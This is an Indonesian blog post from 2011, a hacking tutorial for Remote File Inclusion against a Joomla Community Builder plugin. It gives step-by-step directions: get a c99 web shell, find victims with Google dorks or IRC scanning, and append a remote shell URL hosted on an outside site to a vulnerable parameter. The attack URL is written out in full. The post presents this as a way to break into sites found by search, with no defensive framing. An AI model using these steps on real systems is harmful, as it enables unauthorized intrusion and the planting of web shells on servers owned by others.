Hacking Melalui RFI (Remote File Inclusion)

By Sunday, February 20, 2011 2 Comments
Hacking Melalui RFI (Remote File Inclusion)

Apa itu RFI ?? RFI adalah metode hacking dengan menggunakan cara yaitu meng-include suatu file dari luar server.

Langsung saja :

Kita sediakan Injector(shell) kita, dalam hal ini saya menggunakan shell c99. ini injektor yang saya gunakan.
Kemudian kita cari target yang bisa kita dapatkan lewat search di Google atau pun lewat scanning IRC dengan kata kunci/dork nya anda bisa dapatkan di milw0rm.com atau bisa anda ambil di sini.

Misalkan kita mendapatkan target yaitu www.blabla.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=

Cara Injeksi nya yaitu menjadi www.targetanda.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[shell anda] lebih jelas lagi menjadi www.targetanda.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://wonaza.webs.com/rfi.txt??

jika tidak ada tampilan apa² di browser maka target sudah tidak Vuln lagi....dan jika berhasil akan ada tampilan shell anda


Selesai.

Don't Learn to Hack but Hack to Learn


2 Responses to "Hacking Melalui RFI (Remote File Inclusion)"

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel